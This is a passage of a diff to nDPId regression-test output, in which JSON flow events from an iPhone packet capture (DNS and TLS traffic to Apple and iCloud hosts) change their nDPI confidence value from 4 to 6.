{"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} 
-00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} 
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, 
OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCUOgAAP8R5V\/AqAIRwKgCAfrLADUALpJfu2MBAAABAAAAAAAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAE="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABB1EAAAP8RYgjAqAIRwKgCAdBFADUALQ1OiY4BAAABAAAAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAQ=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7QA4AAP8R9kDAqAIRwKgCAfQ+ADUAJzA9jewBAAABAAAAAAAAA2NsNAVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCtyIAAP8RfyXAqAIRwKgCAfeRADUALilRj7EBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="} 
-00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD8ooAAP8RQ7zAqAIRwKgCAdAYADUALxueCAsBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 